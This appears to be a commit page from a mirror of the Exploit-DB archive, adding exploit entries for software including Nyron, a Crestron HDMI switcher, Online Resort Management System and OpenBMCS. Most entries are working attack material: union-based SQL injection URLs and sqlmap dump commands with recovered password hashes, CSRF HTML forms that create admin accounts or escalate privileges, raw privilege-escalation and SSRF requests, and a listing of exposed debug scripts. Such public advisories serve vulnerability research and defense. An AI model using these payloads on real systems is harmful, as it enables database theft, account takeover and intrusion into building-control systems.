bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-01-19

Browse source 
12 changes to exploits/shellcodes

WorkTime 10.20 Build 4967 - Unquoted Service Path

Archeevo 5.0 - Local File Inclusion
Online Resort Management System 1.0 - SQLi (Authenticated)
OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
OpenBMCS 2.4 - SQLi (Authenticated)
OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation
OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)
OpenBMCS 2.4 - Information Disclosure
Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
Simple Chatbot Application 1.0 - 'message' Blind SQLi
Nyron 1.0 - SQLi (Unauthenticated)
Creston Web Interface 1.0.0.2159 - Credential Disclosure
This commit is contained in:
Offensive Security 2022-01-19 05:01:58 +00:00
parent 77bb25c902
commit eb2b6f5cfd
13 changed files with 1108 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
exploits/aspx/webapps/50674.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)
# Google Dork: inurl:"winlib.aspx"
# Date: 01/18/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: http://www.wecul.pt/
# Software Link: http://www.wecul.pt/solucoes/bibliotecas/
# Version: < 1.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.
# 2. Proof of Concept (PoC)
https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='">
# 3. Research:
https://miguelsantareno.github.io/edp.pdf

151
exploits/hardware/webapps/50675.txt Normal file
View file

@ -0,0 +1,151 @@
# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure
# Exploit Author: RedTeam Pentesting GmbH
Advisory: Credential Disclosure in Web Interface of Crestron Device
When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.
Details
=======
Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178
Introduction
============
"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directory® credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."
(from the vendor's homepage)
More Details
============
Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.
Proof of Concept
================
Requesting the URL "http://crestron.example.com/" via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:
------------------------------------------------------------------------
http://crestron.example.com/aj.html?a=devi&_=[...]
------------------------------------------------------------------------
This request results in a response similar to the following:
------------------------------------------------------------------------
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html
{
"login_ur": 0,
"front_val": [
0,
1
],
"uname": "admin",
"upassword": "password"
}
------------------------------------------------------------------------
The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.
Workaround
==========
Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.
Fix
===
No fix known.
Security Risk
=============
As user credentials are disclosed to visitors of the web interface they
can directly be used to authenticate to it. The access allows to modify
the device's input and output settings as well as to upload and install
new firmware. Due to ease of exploitation and gain of administrative
access this vulnerability poses a high risk.
Timeline
========
2021-10-06 Vulnerability identified
2021-11-15 Customer approved disclosure to vendor
2021-12-08 Vendor notified
2021-12-15 Vendor notified again
2021-12-21 Vendor response received: "The device in question doesn't support
Crestron's security practices. We recommend the HD-MD-4KZ alternative."
2021-12-22 Requested confirmation, that the vulnerability will not be addressed.
2021-12-28 Vendor confirms that the vulnerability will not be corrected.
2022-01-12 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

88
exploits/php/webapps/50666.txt Normal file
View file

@ -0,0 +1,88 @@
# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)
# Date: 15/01/2022
# Exploit Author: Gaurav Grover
# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>
# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>
# Version: 1.0
# Tested on: Linux and windows both
Summary:
There are a vulnerabilities in Online Resort Management System (ORMS)
1. The attacker can easily retrieved the database using sql injection.
Proof of concepts :
Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:
1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=
2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+
3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+
4. (Database Name :- orms_db)
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+
5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+
6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea
Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:
1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs
available databases [8]:
[*] clinic_db
[*] information_schema
[*] mtms_db
[*] mysql
[*] orms_db
[*] performance_schema
[*] phpmyadmin
[*] test
2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables
Database: mtms
[6 tables]
+------------------+
| activity_list |
| message_list |
| reservation_list |
| room_list |
| system_info |
| users |
+------------------+
3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump
Database: orms_db
Table: users
[2 entries]
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |
| 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+

54
exploits/php/webapps/50667.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 CSRF Send E-mail
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php
26.10.2021
--
<html>
<body>
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="submit" value="Send" />
</form>
</body>
</html>

73
exploits/php/webapps/50668.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Authenticated SQL Injection
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
the 'id' GET parameter is not properly sanitised before being returned to the
user or used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Semen 'samincube' Rozhkov
@zeroscience
Advisory ID: ZSL-2022-5692
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php
26.10.2021
--
The following PoC request demonstrates the issue (authenticated user session is required):
GET /debug/obix_test.php?id=1%22 HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
Connection: close
Response:
HTTP/1.1 200 OK
Date: Sat, 1 Jan 2022 15:09:54 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146
Stack trace:
#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')
#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)
#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')
#3 {main}
thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />

275
exploits/php/webapps/50669.txt Normal file
View file

@ -0,0 +1,275 @@
# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Create Admin / Remote Privilege Escalation
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application suffers from an insecure permissions and privilege
escalation vulnerability. A regular user can create administrative users
and/or elevate her privileges by sending an HTTP POST request to specific
PHP scripts in '/plugins/useradmin/' directory.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5693
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php
26.10.2021
--
List current ID and permissions (read):
---------------------------------------
POST /plugins/useradmin/getUserDetails.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 16
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id_list%5B%5D=17
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:56:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 692
Connection: close
Content-Type: text/html; charset=UTF-8
[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]
List current ID and permissions (admin):
----------------------------------------
POST /plugins/useradmin/getUserDetails.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 16
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id_list%5B%5D=18
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:56:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 725
Connection: close
Content-Type: text/html; charset=UTF-8
[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]
Escalate privileges:
--------------------
POST /plugins/useradmin/update_user_permissions.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 702
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:58:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
2
Create admin from read user:
----------------------------
POST /plugins/useradmin/create_user.php HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4
Content-Length: 1010
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0
HTTP/1.1 200 OK
Date: Tue, 16 Nov 2021 20:18:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
PoC escalate from editor to admin:
----------------------------------
<html>
<body>
<form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST">
<input type="hidden" name="permissions[0][permissions]" value="3" />
<input type="hidden" name="permissions[0][moduleID]" value="alarms" />
<input type="hidden" name="permissions[0][mod_home]" value="1" />
<input type="hidden" name="permissions[1][permissions]" value="2" />
<input type="hidden" name="permissions[1][moduleID]" value="controllers" />
<input type="hidden" name="permissions[1][mod_home]" value="1" />
<input type="hidden" name="permissions[2][permissions]" value="1" />
<input type="hidden" name="permissions[2][moduleID]" value="core" />
<input type="hidden" name="permissions[3][permissions]" value="4" />
<input type="hidden" name="permissions[3][moduleID]" value="graphics" />
<input type="hidden" name="permissions[3][mod_home]" value="1" />
<input type="hidden" name="permissions[4][permissions]" value="3" />
<input type="hidden" name="permissions[4][moduleID]" value="history" />
<input type="hidden" name="permissions[4][mod_home]" value="1" />
<input type="hidden" name="permissions[5][permissions]" value="3" />
<input type="hidden" name="permissions[5][moduleID]" value="progtool" />
<input type="hidden" name="permissions[6][permissions]" value="4" />
<input type="hidden" name="permissions[6][moduleID]" value="useradmin" />
<input type="hidden" name="id" value="17" />
<input type="submit" value="Esc" />
</form>
</body>
</html>
PoC create admin from editor:
-----------------------------
<html>
<body>
<form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST">
<input type="hidden" name="user[username]" value="testingus2" />
<input type="hidden" name="user[fullname]" value="TestName" />
<input type="hidden" name="user[phone]" value="1112223333" />
<input type="hidden" name="user[password]" value="Password123" />
<input type="hidden" name="user[passwordConfirm]" value="Password123" />
<input type="hidden" name="user[email]" value="testingus@test.tld" />
<input type="hidden" name="user[expiry]" value="" />
<input type="hidden" name="permissions[0][moduleID]" value="alarms" />
<input type="hidden" name="permissions[0][permissions]" value="3" />
<input type="hidden" name="permissions[0][mod_home]" value="1" />
<input type="hidden" name="permissions[1][moduleID]" value="controllers" />
<input type="hidden" name="permissions[1][permissions]" value="2" />
<input type="hidden" name="permissions[1][mod_home]" value="1" />
<input type="hidden" name="permissions[2][moduleID]" value="core" />
<input type="hidden" name="permissions[2][permissions]" value="1" />
<input type="hidden" name="permissions[2][mod_home]" value="0" />
<input type="hidden" name="permissions[3][moduleID]" value="graphics" />
<input type="hidden" name="permissions[3][permissions]" value="4" />
<input type="hidden" name="permissions[3][mod_home]" value="1" />
<input type="hidden" name="permissions[4][moduleID]" value="history" />
<input type="hidden" name="permissions[4][permissions]" value="3" />
<input type="hidden" name="permissions[4][mod_home]" value="1" />
<input type="hidden" name="permissions[5][moduleID]" value="progtool" />
<input type="hidden" name="permissions[5][permissions]" value="3" />
<input type="hidden" name="permissions[5][mod_home]" value="0" />
<input type="hidden" name="permissions[6][moduleID]" value="useradmin" />
<input type="hidden" name="permissions[6][permissions]" value="4" />
<input type="hidden" name="permissions[6][mod_home]" value="0" />
<input type="submit" value="Cre" />
</form>
</body>
</html>

95
exploits/php/webapps/50670.txt Normal file
View file

@ -0,0 +1,95 @@
# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Unauthenticated SSRF / RFI
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include
(RFI) vulnerability exists in OpenBMCS within its functionalities. The application
parses user supplied data in the POST parameter 'ip' to query a server IP on port
81 by default. Since no validation is carried out on the parameter, an attacker
can specify an external domain and force the application to make an HTTP request
to an arbitrary destination host. This can be used by an external attacker for
example to bypass firewalls and initiate a service and network enumeration on the
internal network through the affected application, allows hijacking the current
session of the user, execute cross-site scripting code or changing the look of
the page and content modification on current display.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5694
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php
26.10.2021
--
POST /php/query.php HTTP/1.1
Host: 192.168.1.222
Content-Length: 29
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.222
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.222/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ip=www.columbia.edu:80&argu=/
HTTP/1.1 302 Found
Date: Tue, 14 Dec 2021 20:26:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../login.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<!-- developed by CUIT -->
<!-- 08/28/18, 8:55:54am --><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
<meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" />
<title>Columbia University in the City of New York</title>
...
...

109
exploits/php/webapps/50671.txt Normal file
View file

@ -0,0 +1,109 @@
# Exploit Title: OpenBMCS 2.4 - Information Disclosure
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Secrets Disclosure
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information and gain full BMS access.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5695
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php
26.10.2021
--
https://192.168.1.222/debug/
Index of /debug
change_password_sqls
clear_all_watches.php
controllerlog/
dash/
dodgy.php
fix_out.php
graphics/
graphics_diag.php
graphics_ip_diag/
jace_info.php
kits/
mysession.php
nuke.php
obix_test.php
print_tree.php
reboot_backdoor.php
rerunSQLUpdates.php
reset_alarm_trigger_times.php
system/
test_chris_obix.php
timestamp.php
tryEmail.php
trysms.php
unit_testing/
userlog/
...
...
/cache/
/classes/
/config/
/controllers/
/core/
/css/
/display/
/fonts/
/images/
/js/
/php/
/plugins/
/sounds/
/temp/
/tools/
